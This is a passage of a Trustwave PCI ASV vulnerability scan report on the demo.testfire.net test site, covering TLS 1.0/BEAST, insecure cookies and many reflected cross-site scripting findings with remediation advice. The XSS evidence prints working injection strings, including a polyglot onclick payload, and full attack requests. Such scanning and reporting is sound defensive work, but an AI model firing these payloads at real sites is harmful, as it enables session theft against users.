Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 411 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
Form Name: login
Action: http://demo.testfire.net:80/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://demo.testfire.net/login.jsp

Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.

123 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.

CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 412 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA

Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.

124 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net:8443/util/serverStatusCheckService.js


p?HostName=%3Cscript%3Ealert%2815650661.00947%29%3
C%2Fscript%3E
Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 413 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
This web site responded to a harmless web request that included
Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/util/serverStatusCheckService.jsp?HostN
ame=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650661.00947)</script>
Detection: An alert was detected containing 15650661.00947
Request: GET https://demo.testfire.net:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 414 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
8443/util/serverStatusCheckService.jsp?HostName=%3Cscript%3Ealert
%2815650661.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: https://demo.testfire.net:8443/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

125 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net/sendFeedback


Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 415 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00617)//>*/alert(15650658.00617)/*
Detection: An alert was detected containing 15650658.00617

Request: POST https://demo.testfire.net/sendFeedback HTTP/1.1


Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 416 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Referer: https://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00617%29%2F%
2F%3E*%2Falert%2815650658.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

126 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117:8443/util/serverStatusCheckService.jsp?


HostName=%3Cscript%3Ealert%2815650661.00947%29%3C
%2Fscript%3E
Port: tcp/8443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 417 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
A reflected cross-site scripting vulnerability was identified in this web
application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET - https://65.61.137.117:8443/util/serverStatusCheckService.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 418 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
HostName=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript
%3E - HostName
Injection: <script>alert(15650661.00947)</script>
Detection: An alert was detected containing 15650661.00947

Request: GET
https://65.61.137.117:8443/util/serverStatusCheckService.jsp?HostNam
e=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://65.61.137.117:8443/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

127 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net:8080/index.jsp?content=javascript%3


A%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2F
textarea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00127%

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 419 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
2Falert%2815650659.00127%29%2F*
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 420 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00127%29%2F%
2F%3E*%2Falert%2815650659.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650659.00127)//>*/alert(15650659.00127)/*
Detection: An alert was detected containing 15650659.00127
Request: GET
http://demo.testfire.net:8080/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00127%29%2F%
2F%3E*%2Falert%2815650659.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 421 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Please note that the listing of XSS vulnerabilities is not an exhaustive
list, and other XSS vulnerabilities may exist in the application.

128 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Eale


rt%2815650660.00037%29%3C%2Fscript%3E
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 422 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 423 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Please note that the listing of XSS vulnerabilities is not an exhaustive
list, and other XSS vulnerabilities may exist in the application.

129 Insecure configuration of 4.3 Medium Fail URL: http://65.61.137.117:8080/


Cookie attributes Port: tcp/8080

A Cookie Vulnerability helps an attacker to gain access to session


information stored in cookies. It may also be used as a 'locator' attack
that precedes a Cross-Site Scripting (XSS) or Man-In-The-Middle attack.
When looking for Cookie Vulnerabilities, an attacker will first observe
cookies through various HTTP proxies and check their attributes. The
attacker will then try to steal cookies of various users by employing
multiple attacks. If successful, he/she may be able to get sensitive
information which can be further used in an illegitimate way.

CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29

Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 76aa5ac0228d700d9219ed73f9533b78
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 424 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.

130 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Eal


ert%2815650661.00037%29%3C%2Fscript%3E
Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 425 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 426 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

131 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117/index.jsp?content=javascript%3A%2F%2


F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea
%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%
29%2F%2F%3E*%2Falert%2815650656.00127%29%2F*
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 427 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00127)//>*/alert(15650656.00127)/*
Detection: An alert was detected containing 15650656.00127
Request: GET
http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 428 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

132 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117/sendFeedback


Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 429 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00617)//>*/alert(15650642.00617)/*
Detection: An alert was detected containing 15650642.00617

Request: POST https://65.61.137.117/sendFeedback HTTP/1.1


Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 430 of 1637
